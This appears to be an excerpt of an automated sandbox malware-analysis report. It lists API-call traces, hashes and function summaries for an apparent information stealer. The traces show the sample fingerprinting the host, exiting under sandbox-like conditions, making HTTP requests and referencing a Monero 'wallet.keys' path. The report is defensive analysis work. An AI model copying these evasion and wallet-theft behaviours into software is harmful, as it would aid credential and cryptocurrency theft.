                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------
                        • API String ID: 460715078-2180234286
                        • Opcode ID: 6ede43e09007dc41e93c958c1f4c5eb7aca8e972c0f429193bc7b1f58a5ab3da
                        • Instruction ID: 3e9142d4d81e1cf55e8a7232fd54e396dbb61fac51516283844269a5a8270678
                        • Opcode Fuzzy Hash: 6ede43e09007dc41e93c958c1f4c5eb7aca8e972c0f429193bc7b1f58a5ab3da
                        • Instruction Fuzzy Hash: 14120F719101189ADB19EBA4DC92FEEB778FF54300F5081A9B11AA2095DF706F49CF63
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 1d04dcff6daf5c2842bd87c2ad8b8f811ccbe071d6c4fa9b6b784e00c905cfff
                        • Instruction ID: 4edf2b6d2abe5ffd4f0246f480d328253b4db706c584b2b45e3b518a2eef6f09
                        • Opcode Fuzzy Hash: 1d04dcff6daf5c2842bd87c2ad8b8f811ccbe071d6c4fa9b6b784e00c905cfff
                        • Instruction Fuzzy Hash: 340186B1904209EFC700DFD4DD45BAABBF8FB05B21F104219F645E3280C3785904CBA2
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: f73b4c280847de73e84dc4681c35e59c614f9f46ea7059f1629fdd71f2ee22d9
                        • Instruction ID: 09e2d11e4bc54d5fe854ad34f111d290c4b5f584aaa42a5a56ff3357c6003331
                        • Opcode Fuzzy Hash: f73b4c280847de73e84dc4681c35e59c614f9f46ea7059f1629fdd71f2ee22d9
                        • Instruction Fuzzy Hash: 2BF044B1944209ABC700DFD4DD45FAEBBF8FB09711F100159FA15E2680C7785505CBA1
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 2e3bb39154bec08c12252dec9364e46eac4de7ce8276924abeab6947cf2ba109
                        • Instruction ID: 015ebf2de52d4f2a3fc87f2e1df6b329c34bfcf48871df7388fb058f7615ddad
                        • Opcode Fuzzy Hash: 2e3bb39154bec08c12252dec9364e46eac4de7ce8276924abeab6947cf2ba109
                        • Instruction Fuzzy Hash: AED05E7490030DDBCB00DFE0D8496EEBBB8FB09311F001554D905A2380EB305882CBA6

                        Control-flow Graph (rendered graph not reproduced in this text extract)
                        APIs
                        • GetProcAddress.KERNEL32(75900000,011572A8), ref: 00879C2D
                        • GetProcAddress.KERNEL32(75900000,01157408), ref: 00879C45
                        • GetProcAddress.KERNEL32(75900000,011699E0), ref: 00879C5E
                        • GetProcAddress.KERNEL32(75900000,011697E8), ref: 00879C76
                        • GetProcAddress.KERNEL32(75900000,0116D5C0), ref: 00879C8E
                        • GetProcAddress.KERNEL32(75900000,0116D380), ref: 00879CA7
                        • GetProcAddress.KERNEL32(75900000,0115BB38), ref: 00879CBF
                        • GetProcAddress.KERNEL32(75900000,0116D4E8), ref: 00879CD7
                        • GetProcAddress.KERNEL32(75900000,0116D4B8), ref: 00879CF0
                        • GetProcAddress.KERNEL32(75900000,0116D4D0), ref: 00879D08
                        • GetProcAddress.KERNEL32(75900000,0116D500), ref: 00879D20
                        • GetProcAddress.KERNEL32(75900000,01157468), ref: 00879D39
                        • GetProcAddress.KERNEL32(75900000,011575C8), ref: 00879D51
                        • GetProcAddress.KERNEL32(75900000,01157328), ref: 00879D69
                        • GetProcAddress.KERNEL32(75900000,011575E8), ref: 00879D82
                        • GetProcAddress.KERNEL32(75900000,0116D4A0), ref: 00879D9A
                        • GetProcAddress.KERNEL32(75900000,0116D530), ref: 00879DB2
                        • GetProcAddress.KERNEL32(75900000,0115BD40), ref: 00879DCB
                        • GetProcAddress.KERNEL32(75900000,01157488), ref: 00879DE3
                        • GetProcAddress.KERNEL32(75900000,0116D518), ref: 00879DFB
                        • GetProcAddress.KERNEL32(75900000,0116D578), ref: 00879E14
                        • GetProcAddress.KERNEL32(75900000,0116D548), ref: 00879E2C
                        • GetProcAddress.KERNEL32(75900000,0116D5A8), ref: 00879E44
                        • GetProcAddress.KERNEL32(75900000,01157608), ref: 00879E5D
                        • GetProcAddress.KERNEL32(75900000,0116D458), ref: 00879E75
                        • GetProcAddress.KERNEL32(75900000,0116D3F8), ref: 00879E8D
                        • GetProcAddress.KERNEL32(75900000,0116D5D8), ref: 00879EA6
                        • GetProcAddress.KERNEL32(75900000,0116D5F0), ref: 00879EBE
                        • GetProcAddress.KERNEL32(75900000,0116D608), ref: 00879ED6
                        • GetProcAddress.KERNEL32(75900000,0116D368), ref: 00879EEF
                        • GetProcAddress.KERNEL32(75900000,0116D398), ref: 00879F07
                        • GetProcAddress.KERNEL32(75900000,0116D428), ref: 00879F1F
                        • GetProcAddress.KERNEL32(75900000,0116D590), ref: 00879F38
                        • GetProcAddress.KERNEL32(75900000,0116AAD8), ref: 00879F50
                        • GetProcAddress.KERNEL32(75900000,0116D560), ref: 00879F68
                        • GetProcAddress.KERNEL32(75900000,0116D620), ref: 00879F81
                        • GetProcAddress.KERNEL32(75900000,011574E8), ref: 00879F99
                        • GetProcAddress.KERNEL32(75900000,0116D638), ref: 00879FB1
                        • GetProcAddress.KERNEL32(75900000,01157288), ref: 00879FCA
                        • GetProcAddress.KERNEL32(75900000,0116D350), ref: 00879FE2
                        • GetProcAddress.KERNEL32(75900000,0116D3B0), ref: 00879FFA
                        • GetProcAddress.KERNEL32(75900000,011571C8), ref: 0087A013
                        • GetProcAddress.KERNEL32(75900000,01156F08), ref: 0087A02B
                        • LoadLibraryA.KERNEL32(0116D3C8,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A03D
                        • LoadLibraryA.KERNEL32(0116D3E0,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A04E
                        • LoadLibraryA.KERNEL32(0116D410,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A060
                        • LoadLibraryA.KERNEL32(0116D440,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A072
                        • LoadLibraryA.KERNEL32(0116D470,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A083
                        • LoadLibraryA.KERNEL32(0116D488,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A095
                        • LoadLibraryA.KERNEL32(0116D830,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A0A7
                        • LoadLibraryA.KERNEL32(0116D770,?,00875CA3,00880AEB,?,?,?,?,?,?,?,?,?,?,00880AEA,00880AE3), ref: 0087A0B8
                        • GetProcAddress.KERNEL32(75FD0000,011570E8), ref: 0087A0DA
                        • GetProcAddress.KERNEL32(75FD0000,0116D8F0), ref: 0087A0F2
                        • GetProcAddress.KERNEL32(75FD0000,011693E8), ref: 0087A10A
                        • GetProcAddress.KERNEL32(75FD0000,0116D8D8), ref: 0087A123
                        • GetProcAddress.KERNEL32(75FD0000,01156FE8), ref: 0087A13B
                        • GetProcAddress.KERNEL32(6FEA0000,0115BAE8), ref: 0087A160
                        • GetProcAddress.KERNEL32(6FEA0000,01157208), ref: 0087A179
                        • GetProcAddress.KERNEL32(6FEA0000,0115BD68), ref: 0087A191
                        • GetProcAddress.KERNEL32(6FEA0000,0116D7A0), ref: 0087A1A9
                        • GetProcAddress.KERNEL32(6FEA0000,0116D8A8), ref: 0087A1C2
                        • GetProcAddress.KERNEL32(6FEA0000,01156F68), ref: 0087A1DA
                        • GetProcAddress.KERNEL32(6FEA0000,01157008), ref: 0087A1F2
                        • GetProcAddress.KERNEL32(6FEA0000,0116D6B0), ref: 0087A20B
                        • GetProcAddress.KERNEL32(763B0000,01157188), ref: 0087A22C
                        • GetProcAddress.KERNEL32(763B0000,01157108), ref: 0087A244
                        • GetProcAddress.KERNEL32(763B0000,0116D7D0), ref: 0087A25D
                        • GetProcAddress.KERNEL32(763B0000,0116D7E8), ref: 0087A275
                        • GetProcAddress.KERNEL32(763B0000,01157128), ref: 0087A28D
                        • GetProcAddress.KERNEL32(750F0000,0115BB88), ref: 0087A2B3
                        • GetProcAddress.KERNEL32(750F0000,0115B9D0), ref: 0087A2CB
                        • GetProcAddress.KERNEL32(750F0000,0116D740), ref: 0087A2E3
                        • GetProcAddress.KERNEL32(750F0000,01156F88), ref: 0087A2FC
                        • GetProcAddress.KERNEL32(750F0000,01156F28), ref: 0087A314
                        • GetProcAddress.KERNEL32(750F0000,0115BA20), ref: 0087A32C
                        • GetProcAddress.KERNEL32(75A50000,0116D758), ref: 0087A352
                        • GetProcAddress.KERNEL32(75A50000,01156E88), ref: 0087A36A
                        • GetProcAddress.KERNEL32(75A50000,01169558), ref: 0087A382
                        • GetProcAddress.KERNEL32(75A50000,0116D8C0), ref: 0087A39B
                        • GetProcAddress.KERNEL32(75A50000,0116D848), ref: 0087A3B3
                        • GetProcAddress.KERNEL32(75A50000,01156EA8), ref: 0087A3CB
                        • GetProcAddress.KERNEL32(75A50000,01156FC8), ref: 0087A3E4
                        • GetProcAddress.KERNEL32(75A50000,0116D860), ref: 0087A3FC
                        • GetProcAddress.KERNEL32(75A50000,0116D680), ref: 0087A414
                        • GetProcAddress.KERNEL32(75070000,01157228), ref: 0087A436
                        • GetProcAddress.KERNEL32(75070000,0116D728), ref: 0087A44E
                        • GetProcAddress.KERNEL32(75070000,0116D908), ref: 0087A466
                        • GetProcAddress.KERNEL32(75070000,0116D878), ref: 0087A47F
                        • GetProcAddress.KERNEL32(75070000,0116D788), ref: 0087A497
                        • GetProcAddress.KERNEL32(74E50000,011571E8), ref: 0087A4B8
                        • GetProcAddress.KERNEL32(74E50000,01157148), ref: 0087A4D1
                        • GetProcAddress.KERNEL32(75320000,01156F48), ref: 0087A4F2
                        • GetProcAddress.KERNEL32(75320000,0116D668), ref: 0087A50A
                        • GetProcAddress.KERNEL32(6F060000,01156FA8), ref: 0087A530
                        • GetProcAddress.KERNEL32(6F060000,011571A8), ref: 0087A548
                        • GetProcAddress.KERNEL32(6F060000,01157028), ref: 0087A560
                        • GetProcAddress.KERNEL32(6F060000,0116D6C8), ref: 0087A579
                        • GetProcAddress.KERNEL32(6F060000,01157048), ref: 0087A591
                        • GetProcAddress.KERNEL32(6F060000,01157248), ref: 0087A5A9
                        • GetProcAddress.KERNEL32(6F060000,011570C8), ref: 0087A5C2
                        • GetProcAddress.KERNEL32(6F060000,01157168), ref: 0087A5DA
                        • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0087A5F1
                        • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0087A607
                        • GetProcAddress.KERNEL32(74E00000,0116D920), ref: 0087A629
                        • GetProcAddress.KERNEL32(74E00000,01169568), ref: 0087A641
                        • GetProcAddress.KERNEL32(74E00000,0116D938), ref: 0087A659
                        • GetProcAddress.KERNEL32(74E00000,0116D698), ref: 0087A672
                        • GetProcAddress.KERNEL32(74DF0000,01156E68), ref: 0087A693
                        • GetProcAddress.KERNEL32(6E680000,0116D800), ref: 0087A6B4
                        • GetProcAddress.KERNEL32(6E680000,01157068), ref: 0087A6CD
                        • GetProcAddress.KERNEL32(6E680000,0116D650), ref: 0087A6E5
                        • GetProcAddress.KERNEL32(6E680000,0116D6E0), ref: 0087A6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: HttpQueryInfoA$InternetSetOptionA
                        • API String ID: 2238633743-1775429166
                        • Opcode ID: 86b769aa9320944c2870f4a8d2f3a531f02e7497f87c449bc17f40566337052c
                        • Instruction ID: 526fcb56df2acae6020169079c8171cf4cd00049647df4e7c48753ff37d07a4e
                        • Opcode Fuzzy Hash: 86b769aa9320944c2870f4a8d2f3a531f02e7497f87c449bc17f40566337052c
                        • Instruction Fuzzy Hash: 2F623EB6600212AFC395DFE8ED8896637F9F76E701714851AA609C32F4D7399443CF62

                        Control-flow Graph (rendered graph not reproduced in this text extract)
                        APIs
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00864839
                          • Part of subcall function 008647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00864849
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • InternetOpenA.WININET(00880DFE,00000001,00000000,00000000,00000000), ref: 008662E1
                        • StrCmpCA.SHLWAPI(?,0116ED88), ref: 00866303
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00866335
                        • HttpOpenRequestA.WININET(00000000,GET,?,0116E750,00000000,00000000,00400100,00000000), ref: 00866385
                        • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008663BF
                        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008663D1
                        • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008663FD
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0086646D
                        • InternetCloseHandle.WININET(00000000), ref: 008664EF
                        • InternetCloseHandle.WININET(00000000), ref: 008664F9
                        • InternetCloseHandle.WININET(00000000), ref: 00866503
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                        • String ID: ERROR$ERROR$GET
                        • API String ID: 3749127164-2509457195
                        • Opcode ID: 9eb93bc1145ff392641e54898d44825396da895cee8bc6231fb60a198fe8daf9
                        • Instruction ID: 0b07e4fe82c4149397c1bbe5fd74de6f7c681035f955c52e878efd5874138982
                        • Opcode Fuzzy Hash: 9eb93bc1145ff392641e54898d44825396da895cee8bc6231fb60a198fe8daf9
                        • Instruction Fuzzy Hash: A9712F71A00258ABDB14DFE4DC49BEE77B8FB45700F108158F50AAB2D4DBB4AA85CF52

                        Control-flow Graph (rendered graph not reproduced in this text extract)
                        APIs
                          • Part of subcall function 0087A820: lstrlen.KERNEL32(00864F05,?,?,00864F05,00880DDE), ref: 0087A82B
                          • Part of subcall function 0087A820: lstrcpy.KERNEL32(00880DDE,00000000), ref: 0087A885
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875644
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008756A1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875857
                          • Part of subcall function 0087A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0087A7E6
                          • Part of subcall function 008751F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875228
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                          • Part of subcall function 008752C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875318
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 0087532F
                          • Part of subcall function 008752C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00875364
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 00875383
                          • Part of subcall function 008752C0: lstrlen.KERNEL32(00000000), ref: 008753AE
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0087578B
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00875940
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00875A0C
                        • Sleep.KERNEL32(0000EA60), ref: 00875A1B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        • Associated: 00000000.00000002.2091063671.0000000000860000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000911000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.000000000091D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000942000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091077451.0000000000AAA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000ABE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000C48000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D21000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D4B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091222902.0000000000D59000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091449535.0000000000D5A000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091549519.0000000000EF2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2091562892.0000000000EF3000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen$Sleep
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 507064821-2791005934
                        • Opcode ID: 245e9172db7da670742e6868e30821cddb0e24592a78cfaad51a79bace6f281b
                        • Instruction ID: 7739cbb6530e9c0057b68bd508391e54e6aa3c3149e9fb1173539c8109494fa0
                        • Opcode Fuzzy Hash: 245e9172db7da670742e6868e30821cddb0e24592a78cfaad51a79bace6f281b
                        • Instruction Fuzzy Hash: E2E122719101089ACB18FBB8DC969ED7378FB94300F50C528B51AD61D9EF74EA0ACB93

                        Control-flow Graph

                        [Control-flow graph image omitted (legend: Executed / Not Executed); basic blocks span 008717A0-008719CD]
                        APIs
                        • StrCmpCA.SHLWAPI(00000000,block), ref: 008717C5
                        • ExitProcess.KERNEL32 ref: 008717D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 3c72e6c260c123fe4ccd8e3fb5d3095297ab7f24fd947610908233351acbc01c
                        • Instruction ID: 49e743c9a9ddcd3e1e154cbd919520da2e92b6c287ddc9c76a6432b4bd1262d2
                        • Opcode Fuzzy Hash: 3c72e6c260c123fe4ccd8e3fb5d3095297ab7f24fd947610908233351acbc01c
                        • Instruction Fuzzy Hash: 33517BB4A04209EBCB04DFA8C858BBE7BB5FF54304F10C058E519E7284D735E946CB62

                        Control-flow Graph

                        [Control-flow graph image omitted (legend: Executed / Not Executed); basic blocks span 00877500-0087768E]
                        APIs
                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00877542
                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0087757F
                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877603
                        • RtlAllocateHeap.NTDLL(00000000), ref: 0087760A
                        • wsprintfA.USER32 ref: 00877640
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                        • String ID: :$C$\
                        • API String ID: 1544550907-3809124531
                        • Opcode ID: d14d603da70f09c4d7d56a9ee11739c2c288979a8ca68db32c7f7671afc1c5b8
                        • Instruction ID: 14c55dac87ec47bc85084cd63e69e885fa8d31d79762dc82b171e337c8242848
                        • Opcode Fuzzy Hash: d14d603da70f09c4d7d56a9ee11739c2c288979a8ca68db32c7f7671afc1c5b8
                        • Instruction Fuzzy Hash: AA41A2B1D04248EBDB10DF98DC45BEEBBB8FF18704F104199F509A7284D778AA44CBA6

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161190), ref: 008798A1
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161298), ref: 008798BA
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161340), ref: 008798D2
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011613B8), ref: 008798EA
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011611D8), ref: 00879903
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01169498), ref: 0087991B
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157368), ref: 00879933
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157568), ref: 0087994C
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161118), ref: 00879964
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161130), ref: 0087997C
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,011612B0), ref: 00879995
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161310), ref: 008799AD
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01157588), ref: 008799C5
                          • Part of subcall function 00879860: GetProcAddress.KERNEL32(75900000,01161358), ref: 008799DE
                          • Part of subcall function 0087A740: lstrcpy.KERNEL32(00880E17,00000000), ref: 0087A788
                          • Part of subcall function 008611D0: ExitProcess.KERNEL32 ref: 00861211
                          • Part of subcall function 00861160: GetSystemInfo.KERNEL32(?), ref: 0086116A
                          • Part of subcall function 00861160: ExitProcess.KERNEL32 ref: 0086117E
                          • Part of subcall function 00861110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0086112B
                          • Part of subcall function 00861110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00861132
                          • Part of subcall function 00861110: ExitProcess.KERNEL32 ref: 00861143
                          • Part of subcall function 00861220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0086123E
                          • Part of subcall function 00861220: __aulldiv.LIBCMT ref: 00861258
                          • Part of subcall function 00861220: __aulldiv.LIBCMT ref: 00861266
                          • Part of subcall function 00861220: ExitProcess.KERNEL32 ref: 00861294
                          • Part of subcall function 00876770: GetUserDefaultLangID.KERNEL32 ref: 00876774
                          • Part of subcall function 00861190: ExitProcess.KERNEL32 ref: 008611C6
                          • Part of subcall function 00877850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008611B7), ref: 00877880
                          • Part of subcall function 00877850: RtlAllocateHeap.NTDLL(00000000), ref: 00877887
                          • Part of subcall function 00877850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0087789F
                          • Part of subcall function 008778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00877910
                          • Part of subcall function 008778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00877917
                          • Part of subcall function 008778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0087792F
                          • Part of subcall function 0087A9B0: lstrlen.KERNEL32(?,011695A8,?,\Monero\wallet.keys,00880E17), ref: 0087A9C5
                          • Part of subcall function 0087A9B0: lstrcpy.KERNEL32(00000000), ref: 0087AA04
                          • Part of subcall function 0087A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0087AA12
                          • Part of subcall function 0087A8A0: lstrcpy.KERNEL32(?,00880E17), ref: 0087A905
                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876ACA
                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00876AE8
                        • CloseHandle.KERNEL32(00000000), ref: 00876AF9
                        • Sleep.KERNEL32(00001770), ref: 00876B04
                        • CloseHandle.KERNEL32(?,00000000,?,011694E8,?,0088110C,?,00000000,?,00881110,?,00000000,00880AEF), ref: 00876B1A
                        • ExitProcess.KERNEL32 ref: 00876B22
                        Memory Dump Source
                        • Source File: 00000000.00000002.2091077451.0000000000861000.00000040.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_860000_file.jbxd
